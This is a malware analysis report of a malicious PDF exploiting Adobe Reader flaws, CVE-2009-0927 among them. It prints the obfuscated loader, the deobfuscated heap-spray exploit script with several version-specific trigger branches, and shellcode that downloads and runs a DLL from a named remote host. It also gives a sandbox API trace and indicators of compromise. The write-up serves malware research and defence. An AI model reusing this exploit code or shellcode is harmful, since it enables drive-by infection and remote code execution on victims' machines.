- Virus Total report is:
- https://www.virustotal.com/file/16e7b2f923b0c6f4c194ae791848b70030fa2093da0ee95a3ee926abd679fb81/analysis/
- Sample:
- MD5: 5e77446f3a89fac8cabb49b69cb1471c
- File size: 11.8 KB ( 12088 bytes )
- File name: dropped.pdf
- File type: PDF
- This is a malicious PDF that exploits CVE-2009-0927 (the stack-based buffer overflow in the Collab.getIcon method of Adobe Reader/Acrobat) and, on success, downloads a second-stage payload and executes it on the victim machine. The embedded JavaScript is not limited to getIcon: as the decoded script below shows, it fingerprints the viewer and EScript plug-in version and also carries fallback paths through util.printf, Collab.collectEmailInfo and media.newPlayer, so the getIcon trigger is only the branch taken on the viewer versions it targets first. PDFs of this kind are the infection component of several exploit packs and are used to deliver malware families such as ZeuS, Carberp and Ramnit. The detailed analysis follows:
- =====================
- Retrieved from (wget log; the file is served as application/pdf from a PHP endpoint, which is typical of exploit-pack landing infrastructure):
- =====================
- [code] --00:40:54-- hxxp://91.205.74.23/content/adp1.php?f=172
- => `adp1.php@f=172'
- Connecting to 91.205.74.23:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 12,088 (12K) [application/pdf]
- 100%[====================================>] 12,088 --.--K/s
- 00:40:54 (3.52 MB/s) - `adp1.php@f=172' saved [12088/12088] [/code]
- =====================
- Malicious PDF structure (abridged). Note the chain from the catalog (21 0 obj) through /Names (23 0 obj) to the /JavaScript name tree (24 0 obj) that references object 76: a document-level JavaScript action, so the script runs as soon as the document is opened, with no user interaction:
- =====================
- [code] %PDF-1.6
- %粤マモ
- 7 0 obj
- <</Count 1/Type/Pages/Kids「28 0 R」>>
- endobj
- 21 0 obj
- <</Names 23 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups「」>>>>/StructTreeRoot 11 0 R/Type/Catalog>>
- endobj
- 23 0 obj
- <</JavaScript 24 0 R/AP 8 0 R>>
- endobj
- 24 0 obj
- <</Names「123 0 R 76 0 R」>>
- endobj
- 25 0 obj
- <</S/JavaScript/JS 26 0 R>>
- endobj
- 26 0 obj
- <</Length 1108/Filter「/FlateDecode」>>stream
- endstream
- endobj
- 28 0 obj
- <</Parent 7 0 R/Contents 60 0 R/Rotate 90/MediaBox「0 0 12 92」/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/Properties/ExtGState>>/Type/Page>>
- endobj
- 60 0 obj
- <</Length 539/Filter/FlateDecode/Type/Contents>>stream
- endstream
- endobj
- 76 0 obj
- <</S/JavaScript/JS(
- x='e';
- arr='71@2@53@69@53@59@3@59@17@17@0@32@57@20@6@59@36@35@41@42@38@38@36@35@2@60@69@15@36@35@41@26@2@60@36@35@45@26@69@15@36@35@69@7@42@15@36@35@42@42@26@2@36@35@38@15@60@5@36@35@15@5@41@0@36@35@41@0@42@5@36@35@5@60@15@5@36@35@45@5@41@0@36@35@26@38@3@60@36@35@45@38@41@0@36@35@42@42@5@41@36@35@38@38@40@0@36@35@26@69@41@0@36@35@5@42@42@60@36@35@42@42@45@15@36@35@...........
- ...........
- ...........
- 8@39@29@67@70@71@57@48@68@69@40@71@49@48@23@69@37@56@10@49@39@69@28@53@23@35@10@10@17@55@25@60@49@67@60@70@53@69@17@29@25@49@53@17@55@25@25';
- cc={q:'b+f1k0=9-vl&WA|4 \)<:gDQnS}5zr{oVjpNu%w6yd83_,7EG.a@2>\(I;PsM"c「/Cx」Ktmehi*Uq"'}.q;
- q=x+'v'+'al';
- a=\(Date+String\).substr\(2,3\);
- aa=\(「」.unshift+「」.reverse\).substr\(2,3\);
- if \(aa==a\){
- t='3vtwe';
- e=t「'substr'」;
- w=e\(12\)「q」;
- s=「」;
- ar=arr.split\('@'\);
- n=cc;
- for\(i=0;i<ar.length;i++\){
- s「i」=n「ar「i」」;
- }
- if\(a===aa\)w\(s.join\(''\)\);
- }
- )>>
- endobj
- xref
- 0 155
- trailer
- <</Size 155
- /Root 21 0 R>>
- xref
- 0 0
- trailer
- <</Size 155/Prev 75626/XRefStm 416/Root 21 0 R>>
- startxref
- 78995
- %%EOF [/code]
- =====================
- Deobfuscating the script in object 76: the stub maps each '@'-separated index in arr through the character table cc, joins the result and hands it to eval (the reference to eval is built indirectly from the pieces x, 'v' and 'al' to defeat simple string matching). Before doing so it compares (Date+String).substr(2,3) with ([].unshift+[].reverse).substr(2,3); these are equal on a native engine but not necessarily in a JavaScript emulator, so this looks like a crude anti-analysis check. The decoded payload that eval receives is:
- =====================
- [code] if (e("1"))bjsg = "
- %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
- %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
- %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
- %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
- %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
- %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
- %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
- %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
- %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
- %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
- %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
- %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
- %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
- %u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3731
- %u2632%u3d65%u0033%u0000";
- function ezvr(ra, qy){
- while (ra.length * 2 < qy){
- ra += ra;
- }
- ra = ra.substring(0, qy
- /2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var
- payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=une
- scape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;
- for (var count = 0; count < count2; count ++ ){
- dkg「count」 = yarsp + payload;
- }
- var overflow = unescape("%u0c0c%u0c0c");
- while (overflow.length < 44952){
- overflow += overflow;
- }
- this .collabStore = Collab.collectEmailInfo({
- subj : "", msg : overflow
- }
- );
- }
- function printf(){
- nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
- var payload = unescape(bjsg);
- heapblock = nop + payload;
- bigblock = unescape("%u0A0A%u0A0A");
- headersize = 20;
- spray = headersize + heapblock.length;
- while (bigblock.length < spray){
- bigblock += bigblock;
- }
- fillblock = bigblock.substring(0, spray);
- block = bigblock.substring(0, bigblock.length - spray);
- while (block.length + spray < 0x40000){
- block = block + block + fillblock;
- }
- mem = new Array();
- for (i = 0; i < 1400; i ++ ){
- mem「i」 = block + heapblock;
- }
- var num =
- 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
- 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
- 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
- 88888888888888888888888888;
- util.printf("%45000f", num);
- }
- function geticon(){
- var arry = new Array();
- if (app.doc.Collab.getIcon){
- var payload = unescape(bjsg);
- var hWq500CN = payload.length * 2;
- var qy = 0x400000 - (hWq500CN + 0x38);
- var yarsp = unescape("%u9090%u9090");
- yarsp = ezvr(yarsp, qy);
- var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
- for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
- arry「vqcQD96y」 = yarsp + payload;
- }
- var tUMhNbGw = unescape("%09");
- while (tUMhNbGw.length < 0x4000){
- tUMhNbGw += tUMhNbGw;
- }
- tUMhNbGw = "N." + tUMhNbGw;
- app.doc.Collab.getIcon(tUMhNbGw);
- }
- }
- aPlugins = app.plugIns;
- var sv = parseInt(app.viewerVersion.toString().charAt(0));
- for (var i = 0; i < aPlugins.length; i ++ ){
- if (aPlugins「i」.name == "EScript"){
- var lv = aPlugins「i」.version;
- }
- }
- if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
- geticon();
- }
- else if (lv == 7.1){
- printf();
- }
- else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
- bx();
- }
- else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
- function a(){
- util.printd("p@111111111111111111111111 : yyyy111", new Date());
- }
- var h = app.plugIns;
- for (var f = 0; f < h.length; f ++ ){
- if (h「f」.name == "EScript"){
- var i = h「f」.version;
- }
- }
- if ((i > 8.12) && (i < 8.2)){
- c = new Array();
- var d = unescape("%u9090%u9090");
- var e = unescape(bjsg);
- while (d.length <= 0x8000){
- d += d;
- }
- d = d.substr(0, 0x8000 - e.length);
- for (f = 0; f < 2900; f ++ ){
- c「f」 = d + e;
- }
- a();
- a();
- try {
- this .media.newPlayer(null);
- }
- catch (e){
- }
- a();
- }
- }[/code]
- =====================
- Exploit observed in this run (the branch taken by the version-selection logic at the end of the decoded script; the other branches target different Reader versions via util.printf, Collab.collectEmailInfo and media.newPlayer):
- =====================
- [code] CVE: CVE-2009-0927
- Desc: Adobe getIcon
- Expl: Stack-based buffer overflow in Adobe Reader and Acrobat
- via the getIcon method of a Collab object [/code]
- =====================
- Exploit trigger (the argument passed to app.doc.Collab.getIcon: the string "N." followed by roughly 16 KB of 0x09 padding, matching the tUMhNbGw construction in geticon() above; the heap-sprayed blocks of NOP sled plus shellcode sit at 0x0c0c0c0c):
- =====================
- [code] 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- ...MORE 16,288 BYTES...
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 [/code]
- =====================
- Shellcode (decoded from the %u-escaped string bjsg; the trailing ASCII bytes spell "regsvr32 -s ", "wpbt0.dll" and the download URL hxxp://91.205.74.23/w.php?f=172&e=3):
- =====================
- [code] 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
- 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
- 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
- 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
- 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
- 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
- 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
- 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
- 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
- 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
- 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
- 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
- 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
- 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
- eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
- 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
- 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
- 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
- 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
- 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
- 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
- c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
- 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
- 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
- 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 39 31 2e
- 32 30 35 2e 37 34 2e 32 33 2f 77 2e 70 68 70 3f
- 66 3d 31 37 32 26 65 3d 33 00 00 00 [/code]
- =====================
- API calls made by the shellcode (sandbox trace; it resolves exports from kernel32.dll and urlmon.dll, the addresses shown are those of the analysis VM):
- =====================
- [code] 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://91.205.74.23/w.php?f=172&e=3, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0) [/code]
- =====================
- Shellcode Meanings:
- =====================
- [code] The shellcode first makes its own memory region writable/executable with VirtualProtect, loads urlmon.dll and resolves the user's temp directory with GetTempPathA.
- It then downloads hxxp://91.205.74.23/w.php?f=172&e=3 with URLDownloadToFileA to %TEMP%\wpbt0.dll, launches that file hidden (uCmdShow=0) via WinExec, and additionally runs "regsvr32 -s" on the same file, which silently calls the DLL's DllRegisterServer; any persistence or further installation is therefore done by the downloaded payload itself, not by the shellcode. Finally it calls TerminateThread to end the thread.
- Indicators from this sample: host 91.205.74.23, URIs /content/adp1.php?f=172 and /w.php?f=172&e=3, dropped file %TEMP%\wpbt0.dll, and the PDF with MD5 5e77446f3a89fac8cabb49b69cb1471c. [/code]
- ------
- ZeroDay Japan http://0day.jp
- OPERATION CLEANUP JAPAN | #OCJP
- Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
- sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com